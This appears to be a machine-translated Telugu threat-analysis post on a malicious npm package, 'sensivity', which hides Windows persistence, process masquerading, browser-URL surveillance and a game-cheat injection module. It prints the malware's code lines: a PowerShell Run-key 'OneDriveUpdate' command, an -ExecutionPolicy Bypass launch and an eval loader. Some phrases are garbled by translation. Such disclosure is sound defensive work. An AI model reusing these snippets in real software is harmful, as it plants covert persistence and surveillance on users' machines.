PairLoop: npm ప్యాకేజీలో దాగి ఉన్న రిమోట్-కంట్రోల్ ప్యానెల్

పెయిర్‌లూప్: ఒక npm ప్యాకేజీ, డెబ్బై వెర్షన్లు, మరియు ఒక రహస్య విండోస్ రిమోట్-కంట్రోల్ ప్యానెల్

విషయ సూచిక

తప్పక చదవాల్సిన పోస్ట్‌లు

ఆసక్తికరమైన తాజా పోస్ట్‌లు

TL; DR

npm ప్యాకేజీ సున్నితత్వం ఇది తనను తాను "సెన్సిటివిటీ కంట్రోల్ ప్యానెల్"గా అభివర్ణించుకుంటుంది. విండోస్‌లో ఇది రిమోట్-కంట్రోల్ మరియు నిఘా సాధనంగా పనిచేస్తుంది.

దాని ప్రవేశ స్థానం, launcher.js, దాని స్వంత ప్రాసెస్‌ను రన్‌టైమ్ బ్రోకర్‌గా పేరు మార్చి, ఆటోస్టార్ట్ రన్-కీ విలువను వ్రాస్తుంది OneDriveUpdate అది ఒక రహస్య VBScript ద్వారా ప్యాకేజీని పునఃప్రారంభించి, PowerShellను ప్రారంభిస్తుంది. -ExecutionPolicy Bypass, ఆపై 6.87 MB నేటివ్ మాడ్యూల్‌తో పాటు 171 KB అస్పష్టమైన సర్వర్ పేలోడ్‌ను మూల్యాంకనం చేస్తుంది, sens.node.

ఇది TCP పోర్ట్ 3000లో ఫోన్-పెయిరింగ్ కంట్రోల్ ప్యానెల్‌ను అందిస్తుంది మరియు విండోస్ UIAutomation ద్వారా యాక్టివ్ బ్రౌజర్ యొక్క అడ్రస్-బార్ URLను చదువుతూ, హార్డ్-కోడెడ్ చేయబడిన ఒక యూట్యూబ్ వీడియో కోసం గమనిస్తూ ఉంటుంది.

ఇంతకుముందు అస్పష్టంగా వదిలివేయబడిన రెండు భాగాలు ఇప్పుడు పరిష్కరించబడ్డాయి. అస్పష్టంగా ఉన్న సర్వర్, server.obf.js, obfuscator.io RC4 స్ట్రింగ్-అరే స్కీమ్‌ను ఉపయోగిస్తుంది; దాని డీకోడర్‌ను ఆఫ్‌లైన్‌లో (జావాస్క్రిప్ట్ అమలు చేయకుండా) తిరిగి అమలు చేయడం ద్వారా ఒకే బాహ్య ఎండ్‌పాయింట్‌ను తిరిగి పొందవచ్చు — https://izopi.com/check.php — సంతకం చేసిన లైసెన్స్ ప్రతిస్పందనలను ధృవీకరించడానికి ఉపయోగించే ఎంబెడెడ్ RSA పబ్లిక్ కీతో పాటు.

స్థానిక మాడ్యూల్, sens.nodeఇది ప్యాక్ చేయబడలేదు: దీని ఇంపోర్ట్ టేబుల్ మరియు ఎంబెడెడ్ స్ట్రింగ్స్ దీనిని రిమోట్-ప్రాసెస్ ఇంజెక్షన్ మరియు మెమరీ రీడ్స్/రైట్స్ ద్వారా నడిచే, ఐమ్‌బాట్, ESP (వాల్-హ్యాక్), మరియు ట్రిగ్గర్‌బాట్ ఫీచర్లను అందించే ఒక డైరెక్ట్ఎక్స్ 11 / డియర్ ఇమ్‌గూయ్ ఇన్-గేమ్ ఓవర్‌లేగా గుర్తిస్తాయి.

దీనిలోని స్ట్రింగ్‌లు GTA V / FiveM లకు అనుగుణంగా వాహన ఎంటిటీలు మరియు మ్యాప్ లొకేషన్‌లను సూచిస్తాయి. ఈ npm ప్యాకేజీ, ఆ నేటివ్ మాడ్యూల్ చుట్టూ ఉండే డెలివరీ మరియు పర్సిస్టెన్స్ వ్రాపర్.

నిర్ణయాత్మక సంకేతం సాంకేతికమైనది కాదు, కార్యాచరణపరమైనది: ఒకే అనామక ప్రచురణకర్త ఒకే ప్యాకేజీకి చెందిన సుమారు డెబ్బై వెర్షన్‌లను ప్రచారం చేశారు — 2.5.0 నుండి 2.5.69 వరకు కొన్ని రోజుల పాటు, ప్రతి ఒక్కరూ ఒకే లాంచర్‌ను తీసుకువెళుతూ.

ఇన్‌స్టాల్ లేవు hooksప్యాకేజీ ప్రారంభమైనప్పుడు మాత్రమే పేలోడ్ నడుస్తుంది.

దాడి: అది ఎలా పనిచేస్తుంది

సెన్సిటివిటీ పది ఫైళ్లను పంపుతుంది. package.json చాలా సంక్షిప్తంగా ఉంటుంది: రిపోజిటరీ ఫీల్డ్ లేదు, లైసెన్స్ లేదు, ఒక మెయిన్ మరియు రెండు బిన్ అలియాస్‌లు (సెన్సిటివిటీ, సెన్స్) అన్నీ launcher.js వైపు చూపిస్తాయి, మరియు node launcher.js అనే స్టార్ట్ స్క్రిప్ట్ ఉంటుంది. పోస్ట్‌ఇన్‌స్టాల్ లేదా ప్రీఇన్‌స్టాల్ లేదు. npm ఇన్‌స్టాల్ చేసినప్పుడు ఏదీ ప్రారంభం కాదు. ఒక వినియోగదారు ప్యాకేజీని ప్రారంభించినప్పుడు — అది బిన్ షిమ్, స్టార్ట్ స్క్రిప్ట్, లేదా రిక్వైర్ ద్వారా అయినా — కింద వివరించిన ప్రవర్తన అమలు అవుతుంది.

టార్‌బాల్‌లో లాంచర్, ఒక అస్పష్టమైన సర్వర్, నేటివ్ మాడ్యూల్, ఒక విజువల్ బేసిక్ స్క్రిప్ట్, మరియు కంట్రోల్ ప్యానెల్ కోసం ఒక public/web డైరెక్టరీ ఉంటాయి. launcher.js అనేది చదవగలిగే ఆర్కెస్ట్రేటర్; రన్‌టైమ్‌లో ముఖ్యమైన లాజిక్ అది లోడ్ చేసే రెండు బ్లాబ్స్‌లో ఉంటుంది — ఒక అస్పష్టమైన సర్వర్ మరియు కంపైల్ చేయబడిన నేటివ్ మాడ్యూల్, ఈ రెండూ కింద పరిష్కరించబడ్డాయి.

 ప్రాసెస్ మారువేషం మరియు నకిలీ OneDrive అప్‌డేటర్

అమలు ప్రారంభంలో launcher.js దాని స్వంత ప్రాసెస్ పేరును రెండుసార్లు సెట్ చేస్తుంది:

   javascript process.title = 'Runtime Broker'; 

రన్‌టైమ్ బ్రోకర్ అనేది యాప్ అనుమతులను మధ్యవర్తిత్వం చేసే ఒక చట్టబద్ధమైన విండోస్ ప్రాసెస్ (RuntimeBroker.exe). ఒక నోడ్ ప్రాసెస్‌కు దానికి సరిపోయేలా పేరు మార్చడం వల్ల, టాస్క్ మేనేజర్‌ను ఒకసారి త్వరగా చూసినప్పుడు అసాధారణంగా ఏమీ కనిపించదు.

పెర్సిస్టెన్స్ అనేది డైరెక్ట్ రిజిస్ట్రీ API ద్వారా కాకుండా పవర్‌షెల్ ద్వారా వ్రాయబడుతుంది:

javascript execSync(`powershell -NoProfile -Command "$k='HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run';$n='OneDriveUpdate';$v='wscript.exe \"${vbs}\"';Set-ItemProperty -Path $k -Name $n -Value $v -Force|Out-Null"`, { stdio: 'ignore', timeout: 5000 }); 

ఆటోస్టార్ట్ విలువకు OneDriveUpdate అని పేరు పెట్టారు, మరియు అది ప్యాకేజీని నేరుగా సూచించదు. అది బండిల్ చేయబడిన OneDrive.Standalone.Updater.vbsను నడుపుతున్న wscript.exeను సూచిస్తుంది. ఆ స్క్రిప్ట్ ఒక దాచిన విండోలో node launcher.jsను తిరిగి ప్రారంభిస్తుంది. రన్-కీ పేరు మరియు VBScript ఫైల్ పేరు రెండూ మైక్రోసాఫ్ట్ బ్రాండింగ్‌ను కలిగి ఉంటాయి, కాబట్టి ఆటోస్టార్ట్ ఎంట్రీ ఒక సాధారణ OneDrive టాస్క్‌గా కనిపిస్తుంది.

ఎగ్జిక్యూషన్-పాలసీ బైపాస్‌తో పవర్‌షెల్

లాంచర్ పదేపదే పవర్‌షెల్‌ను ఉపయోగిస్తుంది. ఎగ్జిక్యూషన్ పాలసీ డిసేబుల్ చేయబడి, జనరేట్ చేయబడిన .ps1 ఫైల్‌ను లాంచ్ చేయడమే స్కానర్లు క్రిటికల్‌గా ఫ్లాగ్ చేసే సింక్:

javascript exec('start "Windows PowerShell" powershell -NoProfile -ExecutionPolicy Bypass -File "' + psFile + '"', { cwd: APP_DIR }); 

ఎగ్జిక్యూషన్ పాలసీ బైపాస్ ఆ ఇన్వోకేషన్ కోసం స్థానిక స్క్రిప్ట్-సైనింగ్ తనిఖీని తొలగిస్తుంది. రూపొందించబడిన స్క్రిప్ట్‌లు తదుపరి విభాగంలో వివరించిన బ్రౌజర్-నిఘా మరియు విండో-గుర్తింపు పనిని నిర్వహిస్తాయి.

అస్పష్ట సర్వర్ మరియు స్థానిక మాడ్యూల్

సెటప్ తర్వాత, launcher.js లోడ్ అయి దాని అసలైన పేలోడ్‌ను అమలు చేస్తుంది:

const serverCode = fs.existsSync(path.join(APP_DIR, 'server.obf.js')) ? path.join(APP_DIR, 'server.obf.js') : path.join(APP_DIR, 'server.js'); eval(fs.readFileSync(serverCode, 'utf8'));

server.obf.js అనేది 171 KB ఫైల్ ఉన్న _0x-array ఒబ్ఫస్కేషన్ ఫైల్. ఇది ఒక జావాస్క్రిప్ట్ ప్యాటర్న్, దీనిలో ప్రతి స్ట్రింగ్ మరియు ఐడెంటిఫైయర్‌ను షఫుల్ చేయబడిన అర్రేలోని ఒక ఇండెక్స్‌తో భర్తీ చేసి, ఆపై రన్‌టైమ్‌లో డీ-రిఫరెన్స్ చేస్తారు. ఈ స్కీమ్ obfuscator.io ద్వారా ఉత్పత్తి చేయబడిన RC4 వేరియంట్: ఒకే డీకోడర్ ఫంక్షన్ అర్రేలోని ఒక ఎంట్రీని బేస్64-డీకోడ్ చేసి, ఆపై ప్రతి కాల్‌కు ఒక కీతో దానిని RC4-డీక్రిప్ట్ చేస్తుంది. ఆ డీకోడర్‌ను ఒక ప్రత్యేక స్క్రిప్ట్‌లో తిరిగి అమలు చేయడం ద్వారా — ప్యాకేజీ యొక్క సొంత జావాస్క్రిప్ట్‌ను కాకుండా, సంగ్రహించిన 821-ఎంట్రీల స్ట్రింగ్ అర్రేపై కేవలం ఆ తిరిగి అమలు చేసిన ఫంక్షన్‌ను మాత్రమే రన్ చేయడం ద్వారా — దీనిని శుభ్రంగా అన్‌వైండ్ చేయవచ్చు. దీని ఫలితంగా కనిపించేది పరిమితమే అయినా, ఇది చాలా ప్రభావవంతమైనది.cisive: ఒక బాహ్య URL, `https://izopi.com/check.php`, ఇది LICENSE_URL స్థిరాంకానికి కేటాయించబడింది; ఒక ఎంబెడెడ్ RSA `PUBLIC_KEY_PEM`; స్థానిక ప్యానెల్ రూట్‌లు /api/kill, /api/qr.png, /api/trigger, /api/url, /trigger/off, మరియు /trigger/status; మరియు `child_process`, `crypto`, మరియు `[Sensivity] `sens.node loaded` అనే స్ట్రింగ్‌లు — చివరిది, లాంచర్ `program module loaded` అని తిరిగి వ్రాసే ఖచ్చితమైన లాగ్ లైన్. ఈ ఎండ్‌పాయింట్ ఒక లైసెన్స్ తనిఖీ: క్లయింట్ ఒక ఐడెంటిఫైయర్‌ను పోస్ట్ చేస్తుంది (అస్పష్టమైన సర్వర్ ఒక డిస్కార్డ్ ID: %s స్ట్రింగ్‌ను ఫార్మాట్ చేస్తుంది) మరియు RSA కీ సర్వర్ యొక్క సంతకం చేసిన ప్రతిస్పందనను ధృవీకరిస్తుంది.

sens.node అనేది 6.87 MB పరిమాణం గల ఒక కంపైల్ చేయబడిన నేటివ్ యాడ్ఆన్, మరియు ఇది ప్యాక్ చేయబడలేదు — దీని సెక్షన్ ఎంట్రోపీ 5.6–6.6 మధ్య ఉంటుంది మరియు PE ఇంపోర్ట్, ఎక్స్‌పోర్ట్ పట్టికలు చెక్కుచెదరకుండా ఉన్నాయి, కాబట్టి దీని సామర్థ్యాలను నేరుగా చదవవచ్చు. ఇది napi_register_module_v1 ను ఎక్స్‌పోర్ట్ చేస్తుంది, standard నోడ్ N-API ఎంట్రీ పాయింట్, కాబట్టి eval చేయబడిన సర్వర్ దానిని ఒక సాధారణ requireతో లోడ్ చేస్తుంది. దాని ఇంపోర్ట్ టేబుల్ దీని ఉనికిని తెలియజేస్తుంది. KERNEL32 నుండి ఇది OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateRemoteThread, K32EnumProcessModules, మరియు Process32First/NextW లను తీసుకుంటుంది — ఇవి మరొక ప్రాసెస్‌ను గుర్తించడానికి, దానిలో మెమరీని కేటాయించడానికి, మరియు ఆ మెమరీని చదవడానికి లేదా వ్రాయడానికి ఉపయోగపడే ప్రామాణిక సెట్. USER32 నుండి ఇది GetAsyncKeyState, GetKeyState, mouse_event, మరియు SetCursorPos లను తీసుకుంటుంది; ఇది ఆన్-స్క్రీన్ ఓవర్‌లే కోసం d3d11.dll, D3DCOMPILER_43, మరియు dwmapi లను, మరియు నెట్‌వర్క్ కాల్స్ కోసం పూర్తి WINHTTP సెట్‌ను లింక్ చేస్తుంది. దీనిలో పొందుపరిచిన స్ట్రింగ్‌లు ఫీచర్ సెట్‌కు ఎలాంటి అస్పష్టత లేకుండా పేర్లు పెడతాయి: ఎనేబుల్ ఐంబోట్, ఐంబోట్ FOV, బాక్స్ ESP, స్కెలిటన్ ESP, ట్రిగ్గర్‌బాట్, ESP బిల్డర్, వెహికల్ ESP, ఎలక్ట్రాన్ యాంటీచీట్ డిటెక్టెడ్, మరియు డియర్ ఇమ్‌గూయ్ బ్యానర్ డియర్ ఇమ్‌గూయ్ 1.91.3 WIP. గ్రేప్‌సీడ్ మెడికల్ క్లినిక్ వంటి లొకేషన్ మరియు ఎంటిటీ స్ట్రింగ్‌లు, అలాగే వెహికల్-ESP పదజాలం GTA V / FiveM లకు అనుగుణంగా ఉన్నాయి.

ఈ విభజన వాస్తవానికి ఉద్దేశపూర్వకమైనది: చదవగలిగే launcher.js ఫైల్‌లో, స్కానర్ సులభంగా చదవగలిగే భాగాలు — అంటే పర్సిస్టెన్స్, మాస్క్వెరేడ్, మరియు eval కాల్ — మాత్రమే ఉంటాయి. అదే సమయంలో, అబ్ఫస్కేషన్ అనేది రన్‌టైమ్ సంప్రదించే ఏకైక బాహ్య హోస్ట్‌ను దాచిపెడుతుంది, మరియు బైనరీ ఫైల్ గేమ్-ఓవర్‌లే మరియు ప్రాసెస్-ఇంజెక్షన్ లాజిక్‌ను కలిగి ఉంటుంది. లాంచర్ అనేది పలుచని, ఆడిట్ చేయదగిన పైపొర; అబ్ఫస్కేట్ చేయబడిన సర్వర్ నెట్‌వర్క్ గుర్తింపును దాచిపెడుతుంది; నేటివ్ మాడ్యూల్ అనేది పేలోడ్. మేము బైనరీ యొక్క ఇంపోర్ట్‌లు మరియు స్ట్రింగ్‌లను చదవగలిగేవిగా వర్ణిస్తాము; వాటి నుండి ఆపరేటర్ యొక్క ఉద్దేశ్యాన్ని మేము ఊహించము.

 పోర్ట్ 3000లో ఫోన్-జత చేసే నియంత్రణ ప్యానెల్

లాంచర్ TCP పోర్ట్ 3000లో ఒక స్థానిక వెబ్ సర్వర్‌ను నిర్వహిస్తుంది మరియు దానిని ఒక సింగిల్‌టన్‌గా పరిగణిస్తుంది. ఇది ఇప్పటికే ఉన్న లిజనర్ కోసం ప్రశ్నించి, బైండింగ్ చేయడానికి ముందు దానిని క్లియర్ చేస్తుంది:

 javascript execSync('powershell -NoProfile -Command "$c=Get-NetTCPConnection -LocalPort 3000 -State Listen -EA 0; if($c){$c | ForEach-Object { Stop-Process -Id $_.OwningProcess -Force -EA 0 }}"', { stdio: 'ignore', timeout: 5000 }); 

ప్యానెల్ http://localhost:3000 వద్ద అందుబాటులో ఉంటుంది, దీనికి http://192.168.1.16:3000 అనే హార్డ్-కోడెడ్ LAN ఫాల్‌బ్యాక్ URL ఉంటుంది. public/ డైరెక్టరీ మరియు ప్యానెల్ యొక్క ప్రవర్తన QR-పెయిరింగ్ ఫ్లోకు అనుగుణంగా ఉంటాయి: ఒక ఫోన్ కోడ్‌ను స్కాన్ చేసి, హోస్ట్‌కు రిమోట్‌గా కనెక్ట్ అవుతుంది. లాంచర్‌లో ఎటువంటి బాహ్య కమాండ్-అండ్-కంట్రోల్ డొమైన్ స్పష్టంగా కనిపించదు — కానీ, పైన డీఓబ్ఫస్కేషన్ చూపినట్లుగా, ఓబ్ఫస్కేట్ చేయబడిన సర్వర్‌లో ఒకటి ఉంది: అదే izopi.com లైసెన్స్ ఎండ్‌పాయింట్. ప్యానెల్ స్వయంగా లోకల్ మరియు LAN-స్కోప్డ్; దాని ఏకైక అవుట్‌బౌండ్ హోస్ట్ ఆ లైసెన్స్ చెక్ మాత్రమే.

వేరు చేయబడిన సూపర్‌వైజర్/వర్కర్ మోడల్ ప్రాసెస్‌ను సజీవంగా ఉంచుతుంది. లాంచర్ SENSIVITY_SUPERVISOR మరియు SENSIVITY_WORKER ఎన్విరాన్‌మెంట్ ఫ్లాగ్‌లతో తనను తాను తిరిగి పునఃప్రారంభిస్తుంది, ప్రతి చైల్డ్ ప్రాసెస్ దాగి ఉండి నడుస్తుంది, కాబట్టి ఒక ప్రాసెస్‌ను నిలిపివేస్తే, దానిని పునఃప్రారంభించడానికి ఒక వాచ్‌డాగ్ మిగిలి ఉంటుంది.

బ్రౌజర్ నిఘా మరియు యూట్యూబ్ సిగ్నల్

అత్యంత నిర్దిష్టమైన ప్రవర్తన బ్రౌజర్ పర్యవేక్షణ. launcher.js అనేది పవర్‌షెల్‌ను నిర్మిస్తుంది, ఇది నడుస్తున్న బ్రౌజర్ యొక్క అడ్రస్ బార్‌ను చదవడానికి విండోస్ UIAutomationను నడిపిస్తుంది:

 javascript '$pattern = $edit.GetCurrentPattern([System.Windows.Automation.ValuePattern]::Pattern)', 

ValuePattern ఒక UI ఎలిమెంట్ యొక్క టెక్స్ట్ కంటెంట్‌ను తిరిగి ఇస్తుంది. దీనిని బ్రౌజర్ యొక్క అడ్రస్-బార్ ఎడిట్ కంట్రోల్‌కు వర్తింపజేసినప్పుడు, ఇది బ్రౌజర్ ఎక్స్‌టెన్షన్ లేకుండా, డిస్క్‌లోని ప్రొఫైల్‌ను తాకకుండా, మరియు API హుక్ లేకుండా, బాధితుడు ప్రస్తుతం చూస్తున్న URLను తిరిగి ఇస్తుంది. రూపొందించబడిన స్క్రిప్ట్ $browserNames జాబితాను పునరావృతం చేస్తుంది మరియు ఫోర్‌గ్రౌండ్‌లో ఉన్న బ్రౌజర్ యొక్క URL లేదా విండో టైటిల్‌ను సంగ్రహిస్తుంది.

ఆ URL ఒకే హార్డ్-కోడెడ్ టార్గెట్‌కు వ్యతిరేకంగా పరీక్షించబడుతుంది:

 javascript const TARGET_YOUTUBE_VIDEO_ID = 'wJWta2lO0Lw'; 

లాంచర్, యూట్యూబ్‌ను చూపిస్తున్న బ్రౌజర్ విండో కోసం ప్రతి మూడు సెకన్లకు ఒకసారి పోల్ చేస్తుంది, మరియు దాని ద్వారా రూపొందించబడిన పవర్‌షెల్, ఆ వీడియో ఐడితో సరిపోలే Get-YouTubeBrowser / Test-TargetYouTubeUrl జతను కలిగి ఉంటుంది. దీని వలన రెండు రకాల ప్రభావాలు గమనించవచ్చు: బాధితుని స్క్రీన్ నుండి యాక్టివ్ బ్రౌజింగ్ URL చదవబడుతుంది, మరియు హోస్ట్ ఒక నిర్దిష్ట యూట్యూబ్ వీడియోతో ఇంటరాక్ట్ అవుతున్నట్లు గుర్తించబడుతుంది. మేము ఈ యంత్రాంగాన్ని మరియు లక్ష్యాన్ని వివరిస్తాము; వాటి నుండి మేము ఎలాంటి ఉద్దేశాన్ని ఊహించము.

అడ్రస్-బార్ రీడ్‌ను స్కానర్ సెన్సిటివ్_డేటా_ఎన్యూమరేషన్ అని లేబుల్ చేస్తుంది — ఇది నెట్‌వర్క్-సామర్థ్యం గల రన్‌టైమ్‌కు ఫీడ్ చేసే ఒక Process::env మరియు UIAutomation సోర్స్. ఇది విడిగా చూసినప్పుడు ప్రమాదరహితంగా కనిపిస్తుంది మరియు UIAutomation సోర్స్ నుండి అస్పష్టం చేయబడిన సర్వర్ వరకు డేటా లైఫ్‌సైకిల్‌ను ట్రేస్ చేసిన తర్వాత మాత్రమే నిఘాగా మారుతుంది.

కాలక్రమం మరియు వెర్షన్ పరిణామం

సెన్సిటివిటీ అనేది ఒక్కసారి అప్‌లోడ్ చేసేది కాదు. ప్రచురణకర్త ఖాతాలో ఈ ఒక్క ప్యాకేజీకి సంబంధించిన సుమారు డెబ్బై ప్రచురించిన వెర్షన్‌లు ఉన్నాయి, మరియు సమీక్షా సమయంలో కొత్తవి వస్తూనే ఉన్నాయి. 2.5.x సిరీస్‌లో లాంచర్ ఫీచర్ వారీగా అభివృద్ధి చెందుతుంది, అయితే దాని పర్సిస్టెన్స్ మరియు పేలోడ్-లోడింగ్ స్థిరంగా ఉంటాయి.

తేదీ (UTC) గమనించిన సంస్కరణలు లాంచర్ స్థితి
2026-06-02 2.5.8 - 2.5.46 (25) బేస్ క్యూఆర్-ప్యానెల్ లాంచర్; రన్-కీ పర్సిస్టెన్స్; అస్పష్టం చేయబడిన సర్వర్ యొక్క మూల్యాంకనం.
2026-06-03 2.5.53 - 2.5.61 (6) ఒకే వేలిముద్ర; కన్సోల్-ట్రేస్ నిరోధం.
2026-06-04 2.5.67, 2.5.68 (2) పిన్ చేయబడిన YouTube ఎంగేజ్‌మెంట్ లక్ష్యాన్ని జోడిస్తుంది wJWta2lO0Lw.
2026-06-05 2.5.0 - 2.5.69 (24) శ్రేణి అంతటా లోపాలను పూరించే పునఃప్రచురణ; పర్యవేక్షకుడు/కార్మికుల పర్యవేక్షకుడు.

డౌన్‌లోడ్ చేయబడిన వెర్షన్లు — 2.5.0, 2.5.36, మరియు 2.5.69 — లోని లాంచర్‌ను పరిశీలిస్తే నాలుగు శ్రేణులు కనిపిస్తాయి. తొలి బిల్డ్‌లలో బేస్ QR-పెయిరింగ్ లాంచర్ ఉంటుంది. 2.5.33 నుండి UIAutomation అడ్రస్-బార్ హార్వెస్టర్ కనిపిస్తుంది. 2.5.58 నుండి సూపర్‌వైజర్-మేనేజ్‌మెంట్ లేయర్ జోడించబడింది. 2.5.64 నుండి డిటాచ్డ్ సూపర్‌వైజర్/వర్కర్ వాచ్‌డాగ్ ఈ సెట్‌ను పూర్తి చేస్తుంది. అన్నింటిలోనూ, నాలుగు విషయాలు ఎప్పటికీ మారవు: OneDriveUpdate రన్ కీ, OneDrive.Standalone.Updater.vbs డ్రాపర్, eval'd server.obf.js, మరియు sens.node నేటివ్ మాడ్యూల్.

2026-06-05 నాటి విడుదల ముఖ్యమైనది, ఎందుకంటే ఇది కొన్ని రోజుల క్రితం ధృవీకరించబడిన వెర్షన్‌ల కంటే దిగువన ఉన్న 2.5.0 నుండి 2.5.15 వరకు గల తక్కువ వెర్షన్ నంబర్‌లను తిరిగి ప్రచురించింది. దీని ప్రభావం వల్ల రిజిస్ట్రీలో వరుసగా 2.5.x లైన్ ఏర్పడింది, ప్రతి వెర్షన్ ఒకే లాంచర్‌ను కలిగి ఉంది.

రాజీ సూచికలు

దిగువన ఉన్న సూచికలన్నీ ప్యాకేజీ టార్‌బాల్ నుండి నేరుగా చదవబడ్డాయి. చదవగలిగే లాంచర్ కేవలం లూప్‌బ్యాక్ మరియు ఒకే ఒక ప్రైవేట్ LAN చిరునామాను కలిగి ఉంటుంది; izopi.com అనే ఆ ఒక్క బాహ్య హోస్ట్‌నేమ్‌ను, server.obf.jsను ఆఫ్‌లైన్‌లో డీఓబ్ఫస్కేట్ చేయడం ద్వారా పునరుద్ధరించబడింది.

రకం సూచిక గమనికలు
ప్యాకేజీ npm:sensivity (≈70 వెర్షన్లు, 2.5.0-2.5.69) సింగిల్-ప్యాకేజ్ పబ్లిషర్; రిపోజిటరీ లేదు; లైసెన్స్ లేనిది.
ఫైలు launcher.js చదవగలిగే ఆర్కెస్ట్రేటర్; ప్రధాన మరియు బిన్ టార్గెట్.
ఫైలు server.obf.js (≈171 KB) obfuscator.io RC4 స్ట్రింగ్-అరే పేలోడ్, దీని ద్వారా లోడ్ చేయబడింది eval(fs.readFileSync(...)).
ఫైలు sens.node (≈6.87 MB) PE32+ x86-64 నోడ్ N-API యాడ్ఆన్; SHA-256 66b674884042fca2f056d06854325ea0e8bc902d4e3cdaeafd5fe08c7d0aab40.
ఫైలు OneDrive.Standalone.Updater.vbs దాచిన పునఃప్రారంభం (node launcher.js).
నెట్వర్క్ https://izopi.com/check.php అస్పష్టం చేయబడిన సర్వర్ నుండి లైసెన్స్/ప్రామాణీకరణ ఎండ్‌పాయింట్ పునరుద్ధరించబడింది; పొందుపరిచిన RSA పబ్లిక్ కీ ప్రతిస్పందనలను ధృవీకరిస్తుంది.
సామర్ధ్యం OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateRemoteThread రిమోట్-ప్రాసెస్ ఇంజెక్షన్ మరియు మెమరీ రీడ్/రైట్ సామర్థ్యం.
సామర్ధ్యం Enable Aimbot, Box ESP, Triggerbot, Vehicle ESP, Dear ImGui 1.91.3 WIP ఐమ్‌బాట్, ESP, మరియు ట్రిగ్గర్‌బాట్ ఫీచర్లను అమలు చేసే డైరెక్ట్‌ఎక్స్ 11 / ImGui గేమ్ ఓవర్‌లే.
రిజిస్ట్రీ HKCU\Software\Microsoft\Windows\CurrentVersion\Run → OneDriveUpdate ఆటోస్టార్ట్ విలువ సూచిస్తోంది wscript.exe మరియు VBScript లాంచర్.
ప్రాసెస్ process.title = 'Runtime Broker' చట్టబద్ధమైన విండోస్ రన్‌టైమ్ బ్రోకర్ ప్రాసెస్‌గా నటిస్తుంది.
బిహేవియరల్ powershell -NoProfile -ExecutionPolicy Bypass -File <generated>.ps1 రూపొందించిన పవర్‌షెల్ స్క్రిప్ట్‌ల కోసం ఎగ్జిక్యూషన్-పాలసీ బైపాస్ ఉపయోగించబడుతుంది.
బిహేవియరల్ UIAutomation ValuePattern బ్రౌజర్ చిరునామా పట్టీని చదవండి ముందుభాగంలో ఉన్న బ్రౌజర్ విండో యొక్క URLను చదువుతుంది.
బిహేవియరల్ లక్ష్య వీడియో ID wJWta2lO0Lw3-సెకన్ల యూట్యూబ్ పోల్ నిశ్చితార్థ-పర్యవేక్షణ సంకేతాన్ని పిన్ చేసారు.
నెట్వర్క్ http://localhost:3000, ఫాల్‌బ్యాక్ http://192.168.1.16:3000 QR-పెయిరింగ్ కంట్రోల్ ప్యానెల్ స్థానికంగా మరియు LANలో అందుబాటులో ఉంది.
పర్యావరణ SENSIVITY_SUPERVISOR, SENSIVITY_WORKER వేరు చేయబడిన వాచ్‌డాగ్ ప్రాసెస్ సమన్వయ ఫ్లాగ్‌లు.

ఆపాదించడం, ప్రభావం మరియు సమర్థకులు

ఈ ప్యాకేజీని ఒకే npm ఖాతా ప్రచురించింది, దాని ఈమెయిల్ ధృవీకరించబడని Gmail చిరునామాగా పేర్కొనబడింది. ఆ ఖాతాకు రిజిస్ట్రీలో చాలా ప్రతికూల ప్రతిష్టా స్కోరు ఉంది, అది కేవలం ఈ ఒక్క ప్యాకేజీని మాత్రమే నిర్వహిస్తుంది మరియు ప్రచురిస్తుంది, ఇంకా దానికి ఏ లింక్ చేయబడిన సోర్స్ రిపోజిటరీ లేదు. మేము ఈమెయిల్ యాజమాన్యాన్ని ధృవీకరించలేదు మరియు ఈ ప్రచారాన్ని ప్రచురణకర్త ఖాతాకే ఆపాదిస్తున్నాము, పేరున్న ఏ వ్యక్తికీ కాదు. ఈ లాంచర్‌లో ఎలాంటి క్లియర్‌టెక్స్ట్ మౌలిక సదుపాయాలు లేవు, కానీ ఒక బాహ్య హోస్ట్ ఇప్పుడు తెలిసింది: అస్పష్టం చేయబడిన సర్వర్ లైసెన్స్ తనిఖీ కోసం izopi.comను సంప్రదిస్తుంది, మరియు నేటివ్ మాడ్యూల్ — సూచనల వారీగా తిరగేయకుండా, దాని ఇంపోర్ట్ టేబుల్ మరియు స్ట్రింగ్‌ల నుండి చదవబడింది — అనేది మరొక ప్రాసెస్ యొక్క మెమరీలోకి చొప్పించి చదివే ఒక గేమ్ ఓవర్‌లే.

కంట్రోల్-ప్యానెల్ యుటిలిటీని ఆశించి సెన్సిటివిటీని ఇన్‌స్టాల్ చేసి, రన్ చేసే విండోస్ వినియోగదారులపై దీని ప్రభావం స్పష్టంగా కనిపిస్తుంది. ఆ హోస్ట్‌లలో, ఈ ప్యాకేజీ ఒక OneDrive టాస్క్ రూపంలో ఆటోస్టార్ట్ పర్సిస్టెన్స్‌ను ఏర్పాటు చేస్తుంది, ఒక సిస్టమ్ ప్రాసెస్‌ను అనుకరించడానికి తన పేరును మార్చుకుంటుంది, వినియోగదారు బ్రౌజ్ చేస్తున్న దాని యొక్క URLను చదువుతుంది, మరియు లోకల్ నెట్‌వర్క్ ద్వారా మెషీన్‌ను ఒక రిమోట్‌కు అనుసంధానించే పెయిరింగ్ ప్యానెల్‌ను ఏర్పాటు చేస్తుంది. సూపర్‌వైజర్/వర్కర్ వాచ్‌డాగ్ కారణంగా, ఒకే ప్రాసెస్ కిల్ దానిని తొలగించదు; రీబూట్‌ల తర్వాత కూడా రన్-కీ ఎంట్రీ అలాగే ఉంటుంది. ఈ లాంచర్ macOS మరియు Linuxలను లక్ష్యంగా చేసుకోదు — పర్సిస్టెన్స్, పవర్‌షెల్, మరియు UIAutomation పాత్‌లు కేవలం విండోస్‌కు మాత్రమే పరిమితం.

